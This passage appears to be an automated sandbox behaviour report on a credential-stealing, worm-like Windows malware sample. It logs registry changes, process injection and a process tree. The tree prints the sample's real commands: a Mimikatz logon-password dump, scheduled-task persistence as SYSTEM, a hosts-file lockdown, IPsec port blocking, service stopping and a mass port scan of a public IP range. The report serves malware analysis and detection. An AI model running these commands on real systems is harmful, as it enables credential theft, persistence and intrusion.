\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ceitlwt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtcpitiu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2384 cmd.exe 1292 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023455-6.dat nsis_installer_2 behavioral2/files/0x000700000002346f-15.dat nsis_installer_1 behavioral2/files/0x000700000002346f-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ceitlwt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ceitlwt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ceitlwt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ceitlwt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ceitlwt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gyzjuuiut.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ceitlwt.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" ceitlwt.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1292 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3204 schtasks.exe 208 schtasks.exe 2884 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3672 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3672 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1476 ceitlwt.exe Token: SeDebugPrivilege 4300 ceitlwt.exe Token: SeDebugPrivilege 1380 vfshost.exe Token: SeDebugPrivilege 3652 gyzjuuiut.exe Token: SeLockMemoryPrivilege 3996 iggias.exe Token: SeLockMemoryPrivilege 3996 iggias.exe Token: SeDebugPrivilege 5096 gyzjuuiut.exe Token: SeDebugPrivilege 3260 gyzjuuiut.exe Token: SeDebugPrivilege 3064 gyzjuuiut.exe Token: SeDebugPrivilege 4876 gyzjuuiut.exe Token: SeDebugPrivilege 3020 gyzjuuiut.exe Token: SeDebugPrivilege 3300 gyzjuuiut.exe Token: SeDebugPrivilege 2952 gyzjuuiut.exe Token: SeDebugPrivilege 4832 gyzjuuiut.exe Token: SeDebugPrivilege 2004 gyzjuuiut.exe Token: SeDebugPrivilege 3640 gyzjuuiut.exe Token: SeDebugPrivilege 1504 gyzjuuiut.exe Token: SeDebugPrivilege 3796 gyzjuuiut.exe Token: SeDebugPrivilege 5096 gyzjuuiut.exe Token: SeDebugPrivilege 752 gyzjuuiut.exe Token: SeDebugPrivilege 1136 gyzjuuiut.exe Token: SeDebugPrivilege 1512 gyzjuuiut.exe Token: SeDebugPrivilege 640 gyzjuuiut.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3672 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe 3672 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe 1476 ceitlwt.exe 1476 ceitlwt.exe 4300 ceitlwt.exe 4300 ceitlwt.exe 2828 xohudmc.exe 3248 qigmew.exe 2384 ceitlwt.exe 2384 ceitlwt.exe 2364 ceitlwt.exe 2364 ceitlwt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3672 wrote to memory of 2384 3672 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe 82 PID 3672 wrote to memory of 2384 3672 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe 82 PID 3672 wrote to memory of 2384 3672 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe 82 PID 2384 wrote to memory of 1292 2384 cmd.exe 84 PID 2384 wrote to memory of 1292 2384 cmd.exe 84 PID 2384 wrote to memory of 1292 2384 cmd.exe 84 PID 2384 wrote to memory of 1476 2384 cmd.exe 85 PID 2384 wrote to memory of 1476 2384 cmd.exe 85 PID 2384 wrote to memory of 1476 2384 cmd.exe 85 PID 4300 wrote to memory of 1336 4300 ceitlwt.exe 87 PID 4300 wrote to memory of 1336 4300 ceitlwt.exe 87 PID 4300 wrote to memory of 1336 4300 ceitlwt.exe 87 PID 1336 wrote to memory of 3508 1336 cmd.exe 89 PID 1336 wrote to memory of 3508 1336 cmd.exe 89 PID 1336 wrote to memory of 3508 1336 cmd.exe 89 PID 1336 wrote to memory of 2460 1336 cmd.exe 90 PID 1336 wrote to memory of 2460 1336 cmd.exe 90 PID 1336 wrote to memory of 2460 1336 cmd.exe 90 PID 1336 wrote to memory of 2280 1336 cmd.exe 91 PID 1336 wrote to memory of 2280 1336 cmd.exe 91 PID 1336 wrote to memory of 2280 1336 cmd.exe 91 PID 1336 wrote to memory of 4936 1336 cmd.exe 92 PID 1336 wrote to memory of 4936 1336 cmd.exe 92 PID 1336 wrote to memory of 4936 1336 cmd.exe 92 PID 1336 wrote to memory of 3452 1336 cmd.exe 93 PID 1336 wrote to memory of 3452 1336 cmd.exe 93 PID 1336 wrote to memory of 3452 1336 cmd.exe 93 PID 1336 wrote to memory of 3088 1336 cmd.exe 94 PID 1336 wrote to memory of 3088 1336 cmd.exe 94 PID 1336 wrote to memory of 3088 1336 cmd.exe 94 PID 4300 wrote to memory of 3240 4300 ceitlwt.exe 95 PID 4300 wrote to memory of 3240 4300 ceitlwt.exe 95 PID 4300 wrote to memory of 3240 4300 ceitlwt.exe 95 PID 4300 wrote to memory of 1432 4300 ceitlwt.exe 97 PID 4300 wrote to memory of 1432 4300 ceitlwt.exe 97 PID 4300 wrote to memory of 1432 4300 ceitlwt.exe 97 PID 4300 wrote to memory of 3916 4300 ceitlwt.exe 99 PID 4300 wrote to memory of 3916 4300 ceitlwt.exe 99 PID 4300 wrote to memory of 3916 4300 ceitlwt.exe 99 PID 4300 wrote to memory of 752 4300 ceitlwt.exe 110 PID 4300 wrote to memory of 752 4300 ceitlwt.exe 110 PID 4300 wrote to memory of 752 4300 ceitlwt.exe 110 PID 752 wrote to memory of 3736 752 cmd.exe 112 PID 752 wrote to memory of 3736 752 cmd.exe 112 PID 752 wrote to memory of 3736 752 cmd.exe 112 PID 3736 wrote to memory of 2388 3736 wpcap.exe 113 PID 3736 wrote to memory of 2388 3736 wpcap.exe 113 PID 3736 wrote to memory of 2388 3736 wpcap.exe 113 PID 2388 wrote to memory of 2184 2388 net.exe 115 PID 2388 wrote to memory of 2184 2388 net.exe 115 PID 2388 wrote to memory of 2184 2388 net.exe 115 PID 3736 wrote to memory of 512 3736 wpcap.exe 116 PID 3736 wrote to memory of 512 3736 wpcap.exe 116 PID 3736 wrote to memory of 512 3736 wpcap.exe 116 PID 512 wrote to memory of 2140 512 net.exe 118 PID 512 wrote to memory of 2140 512 net.exe 118 PID 512 wrote to memory of 2140 512 net.exe 118 PID 3736 wrote to memory of 1160 3736 wpcap.exe 119 PID 3736 wrote to memory of 1160 3736 wpcap.exe 119 PID 3736 wrote to memory of 1160 3736 wpcap.exe 119 PID 1160 wrote to memory of 908 1160 net.exe 121 PID 1160 wrote to memory of 908 1160 net.exe 121 PID 1160 wrote to memory of 908 1160 net.exe 121 PID 3736 wrote to memory of 680 3736 wpcap.exe 122
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1700
-
C:\Windows\TEMP\kukrtgjtl\iggias.exe"C:\Windows\TEMP\kukrtgjtl\iggias.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\iyvumtbf\ceitlwt.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1292
-
-
C:\Windows\iyvumtbf\ceitlwt.exeC:\Windows\iyvumtbf\ceitlwt.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1476
-
-
-
C:\Windows\iyvumtbf\ceitlwt.exeC:\Windows\iyvumtbf\ceitlwt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3508
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2280
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3452
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3088
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3240
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1432
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bjvibcuuu\vrituptli\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\bjvibcuuu\vrituptli\wpcap.exeC:\Windows\bjvibcuuu\vrituptli\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2184
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2140
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:908
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:680 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:5032
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2440 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3680
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4316 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2232 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3612
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bjvibcuuu\vrituptli\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4936 -
C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exeC:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bjvibcuuu\vrituptli\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bjvibcuuu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bjvibcuuu\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2720 -
C:\Windows\bjvibcuuu\Corporate\vfshost.exeC:\Windows\bjvibcuuu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "utvtlzbly" /ru system /tr "cmd /c C:\Windows\ime\ceitlwt.exe"2⤵PID:4432
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "utvtlzbly" /ru system /tr "cmd /c C:\Windows\ime\ceitlwt.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "etlbiltut" /ru system /tr "cmd /c echo Y|cacls C:\Windows\iyvumtbf\ceitlwt.exe /p everyone:F"2⤵PID:3548
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "etlbiltut" /ru system /tr "cmd /c echo Y|cacls C:\Windows\iyvumtbf\ceitlwt.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "weumgilty" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kukrtgjtl\iggias.exe /p everyone:F"2⤵PID:3652
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "weumgilty" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kukrtgjtl\iggias.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2884
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:116
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1200
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4384
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
